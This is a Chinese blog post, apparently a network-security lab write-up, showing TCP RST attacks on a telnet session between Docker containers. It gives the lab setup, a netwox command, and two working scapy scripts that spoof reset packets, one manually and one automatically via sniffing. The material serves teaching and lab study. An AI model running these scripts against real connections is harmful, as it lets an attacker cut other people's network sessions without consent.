用netwox、scapy进行TCP Reset 的手动攻击和自动攻击

最新推荐文章于 2024-04-03 13:44:19 发布
最新推荐文章于 2024-04-03 13:44:19 发布
阅读量361 收藏 1
点赞数
分类专栏: 计算机网络 文章标签: tcp/ip docker linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56222998/article/details/130257824
版权

文章目录

环境搭建

安装实验docker,保存下面的文件为docker-compose.yml:

version: "3"

services:
    attacker:
        image: handsonsecurity/seed-ubuntu:large
        container_name: seed-attacker
        tty: true
        cap_add:
                - ALL
        privileged: true
        volumes:
                - ./volumes:/volumes
        network_mode: host


    Victim:
        image: handsonsecurity/seed-ubuntu:large
        container_name: victim-10.9.0.5
        tty: true
        cap_add:
                - ALL
        privileged: true
        sysctls:
                - net.ipv4.tcp_syncookies=0

        networks:
            net-10.9.0.0:
                ipv4_address: 10.9.0.5

        command: bash -c "
                      /etc/init.d/openbsd-inetd start  &&
                      tail -f /dev/null
                 "
                  
    User1:
        image: handsonsecurity/seed-ubuntu:large
        container_name: user1-10.9.0.6
        tty: true
        cap_add:
                - ALL
        networks:
            net-10.9.0.0:
                ipv4_address: 10.9.0.6

        command: bash -c "
                      /etc/init.d/openbsd-inetd start  &&
                      tail -f /dev/null
                 "

    User2:
        image: handsonsecurity/seed-ubuntu:large
        container_name: user2-10.9.0.7
        tty: true
        cap_add:
                - ALL
        networks:
            net-10.9.0.0:
                ipv4_address: 10.9.0.7

        command: bash -c "
                      /etc/init.d/openbsd-inetd start  &&
                      tail -f /dev/null
                 "

networks:
    net-10.9.0.0:
        name: net-10.9.0.0
        ipam:
            config:
                - subnet: 10.9.0.0/24

然后执行,安装docker镜像

docker-compose -f docker-compose.yml up -d

打开三个终端,其中一个终端为用户机,另两个终端开启docker,执行./run.sh

#run.sh
docker run -it --privileged "handsonsecurity/seed-ubuntu:large" /bin/bash

172.17.0.2为客户端,172.17.0.3为服务器,在服务器上运行./start.sh,开启telnet服务

/etc/init.d/openbsd-inetd restart

使用下面的命令可以查看是否打开了telnet

netstat -a | grep telnet
# tcp        0      0 0.0.0.0:telnet          0.0.0.0:*               LISTEN

docker删除images,先执行docker images查看待删除的镜像的ID,然后执行 docker ps -a,查看有哪些容器正在使用该ID,然后对全部使用镜像ID的容器执行docker rm <container ID>,最后再运行docker rmi <image ID>

攻击机IP:192.168.100.129
用户机IP:172.17.0.2
目标机IP:172.17.0.3

1)利用netwox进行RESET攻击

在攻击机上执行ifconfig,查看网卡为docker0

在这里插入图片描述

然后执行 netwox 78 -d docker0 -s linkbraw,发起reset攻击,在客户机上随便输入一个字符串,断开了连接

在这里插入图片描述

用wireshark抓包,可以截获两个RESET包

在这里插入图片描述

2)使用scapy进行手动攻击

代码为reset_manual.py,建立telnet连接,用wireshark截取最后一个TCP连接报文,seq填写最后一个报文的ack字段

#!/usr/bin/python3
from scapy.all import *

print("SENDING RESET PACKET.........")
ip  = IP(src="172.17.0.2", dst="172.17.0.3")
tcp = TCP(sport=46360, dport=23,flags="R",seq=4143252215)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)

在这里插入图片描述

将截获的包中的信息填入reset_manaul参数里面,运行python文件,wireshark截获到了RESET报文
在这里插入图片描述

此时在用户端随便输入一个字符,就会断开连接,Connection closed by foreign host,攻击成功
在这里插入图片描述

抓包可以看到,第一行红色的是由攻击机发起的RESET攻击,接着第二行用户机发送了一个TELNET包,由于TCP中断,接着服务器向客户机发送了第三行的RESET包,断开了TCP连接

在这里插入图片描述

3)使用scapy进行自动攻击

建立telnet连接,用wireshark截取最后一个TCP连接报文,代码为reset_auto.py

#!/usr/bin/python3
from scapy.all import *

SRC  = "172.17.0.2"
DST  = "172.17.0.3"
PORT = 23

def spoof(pkt):
    old_tcp = pkt[TCP]
    old_ip  = pkt[IP]

    ip = IP(src=old_ip.dst, dst=old_ip.src)
    tcp = TCP(sport=old_tcp.dport, dport=old_tcp.sport, seq=old_tcp.ack, flags="R")
    
    pkt = ip/tcp
    send(pkt,verbose=0)
    print("Spoofed Packet: {} --> {}".format(ip.src, ip.dst))

f = 'tcp and src host {} and dst host {} and dst port {}'.format(SRC, DST, PORT)
sniff(filter=f, prn=spoof)

原始代码在sniff函数中必须加上 iface=‘docker0’,用netwox时也需要设置网卡为docker0,否则无法发起攻击

攻击机输出截获信息
在这里插入图片描述

用户机连接中断

在这里插入图片描述

wireshark截包

在这里插入图片描述

rebibabo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
netw-ib-ox-ag-5.39.0 Netwox官方原版 网络测试工具
03-19
netw-ib-ox-ag-5.39.0 Netwox官方原版 网络测试工具
网络工具netwox.zip
04-19
网络工具netwox.zip
Netwox netw-ib-ox-ag-5.39.0.tgz )
07-10
Netwox 官方原版 网络测试工具
TCP SYN Flood分析
02-18
数据包分析,tcp攻击,syn攻击,让你如何分析ddos攻击,让你了解ddos攻击的原理。
20222811 2022-2023-2 《网络攻防实践》第四周作业
lbxyzj的博客
03-29 169
20222811 2022-2023-2 《网络攻防实践》第四周作业
使用netwox实现tcp rst 攻击及防御措施
whoim_i的博客
11-18 4077
目录相关原理(tcp基础)实例演示关于防御措施 相关原理(tcp基础) 三次握手:TCP是基于IP网络层之上的传输层协议,用于端到端的可靠的字节流传输。 过程: 1.C向S发送连接请求,标记位SYN设为1,且随机设置序列号seq 2.S返回确认消息,ACK设为seq+1,标记位SYN设为1,随机序列号seq 3.C返回确认消息,ACK设为seq+1 四次挥手:四次挥手指正常连接中断的情况。 过程:...
Matlab和Python实现复杂网络的随机和蓄意攻击
weixin_43886163的博客
02-14 4346
Matlab和Python实现复杂网络的随机和蓄意攻击 1. 使用Network Toolbox来模拟: 「在MATLAB中,可以使用Network Toolbox来模拟和分析复杂网络的随机和蓄意攻击。」 下面是一个简单的演示,以说明如何使用MATLAB来执行这些任务。 「首先,我们需要生成一个随机网络。可以使用networkx包来生成一个随机图形,并将其保存为GML文件格式。这里我们使用一个名为ER随机图形的模型:」 n = 100; % 节点数p =&
社交网络分析之网络攻击模拟
qq_60300168的博客
10-21 385
对于星型网络、全连接网络、环状网络分别模拟网络攻击攻击方式如下:按度中心性攻击、随机攻击、按特征向量中心性攻击。最后绘制结果。
网路设备的端口镜像技术
DREW德鲁
07-26 1119
镜像技术可以在不影响报文正常处理流程的情况下,将镜像端口的报文复制一份到观察端口,用户利用数据监控设备来分析复制到观察端口的报文,进行网络监控和故障排除。 镜像定义 将镜像端口(源端口)的报文复制一份到观察端口(目的端口)。 镜像作用 获取完整报文用于分析网络状况。 镜像优点 不影响原有网络,快捷方便。 采集的是实时数据流,真实可靠。 华为 路由器配置端口镜像 observe-port interface GigabitEthernet0/0/1 配置观察接口 interface GigabitEt
使用Python scapy构造tcp三次握手,遭遇系统发送rst包解决方法
weixin_44704374的博客
12-11 2612
使用Python scapy构造tcp三次握手,遭遇系统发送rst包解决方法 在使用Pyhon scapy库构造TCP时,遭遇到系统底层发送的rst包,导致三次握手无法建立情况。 在网上找了很多解决方案,linux相对好解决,直接使用 iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP 可以干掉系统rst包干扰。 但在windows系统下,...
netwox-5.39.0-bin_windows
06-21
netwox-5.39.0-bin_windows 完全可用
漏洞攻击 --- TCP -- 半开攻击RST攻击
weixin_62443409的博客
07-12 9513
sys 攻击数据是DOS攻击的一种,利用TCP协议缺陷,发送大量的半连接请求,耗费CPU和内存资源,发生在TCP三次握手中。A向B发起请求,B按照正常情况执行响应,A不进行第3次握手,这就是半连接攻击
20232810 2023-2024-2 《网络攻防实践》实验四
最新发布
weixin_46081558的博客
04-03 906
在实验环境中完成TCP/IP协议栈重点协议的攻击实验,包括ARP缓存欺骗攻击、ICMP重定向攻击、SYN Flood攻击TCP RST攻击TCP会话劫持攻击
基于scapytcp reset阻断
thinker
05-04 1118
项目地址 https://github.com/jin-long/how-does-a-tcp-reset-attack-work 参考readme Install dependencies:virtualenv venv && source venv/bin/activate && pip install -r requirements.txt Setu...
20222817 2022-2023-2《网络攻防实践》第四周作业
fuast_liu的博客
03-29 272
本次实验较为简单,主要是执行命令,分析执行原理,通过此次实验,我更加了解了网络攻击都是基于原本的网络协议自生的漏洞,而协议和程序本身的漏洞不可避免地存在,所以要预防网络攻击很难。要保持网络安全,需要我们提高网络安全技能,及时更新漏洞补丁,养成良好的保密习惯。
利用netwox工具进行局域网内TCP会话劫持和RST攻击,步骤清晰,过程简洁
weixin_43476621的博客
07-24 3610
开启telnet服务 检查是否安装telnet和xinetd rpm -qa telnet-server rpm -qa xinetd 如果没有安装,则先安装 安装命令 yum install telnet-server yum install xinetd 安装完成后,将xinetd服务和telnet服务加入开机自启动 systemctl enable xinetd.service systemctl enable telnet.socket 启动以上两个服务 systemctl start telnet
20222823 2021-2022-2 《网络攻防实践》实践四报告
m0_73785345的博客
03-26 83
嗅探链路中所有来自主机192.168.200.3的TCP数据包,并且以网关192.168.200.1的名义向主机192.168.200.3发送ICMP重定向包,重定向以kali的IP地址192.168.200.4作为网关,此时再次使用Ubuntu ping baidu.com 发现重定向数据包如下。对IP地址为192.168.200.130主机的23号端口服务实施攻击,再次使用ubuntu尝试使用telnet服务登录靶机,显示超时无法登录,链接被拒绝。
使用scapy实现TCP SYN-Flooding攻击
redwingz的博客
11-13 4189
  基于ubuntu 16.04系统,首先安装scapy,如下的apt-get或者可使用python的pip命令安装,scapy是一个功能强大网络数据包处理程序,包括对数据包的嗅探、解析和构造。本文即使用其数据包构造功能,实现syn flooding攻击。 # sudo apt-get install scapy TCP SYN Flooding即向服务器的监听端口不断发送TCP的SYN报...
TCP半开攻击(伪造客户端发送SYN、伪造服务器发送RST
Hala
03-18 1546
TCP syn攻击--半开攻击 思路: 在服务器等待客户端的ACK回应时,攻击目标服务器的特定端口 环境: RHEL7.5是TCP请求方 IP:192.168.211.134 RHEL7.2是服务器 IP:192.168.211.133 Kali是攻击IP:192.168.211.130 设计: 没有攻击时,TCP会话建立是很快的 实施: sudo ne...
Ubuntu安装netwox
05-02
要在Ubuntu上安装netwox,请按照以下步骤进行操作: 1. 打开终端。 2. 输入以下命令以更新软件包列表: ``` sudo apt-get update ``` 3. 输入以下命令以安装netwox: ``` sudo apt-get install netwox ``` 4. 等待安装完成后,输入以下命令以验证安装是否成功: ``` netwox -h ``` 如果成功安装,则应该看到netwox的帮助文档。 请注意,如果您的系统中没有添加netwox的软件源,则可能需要手动下载并安装它。在这种情况下,您可以从netwox的官方网站(http://www.laurentconstantin.com/en/netwox/download/)下载适用于Ubuntu的软件包,并按照常规的软件安装步骤进行安装。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

rebibabo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值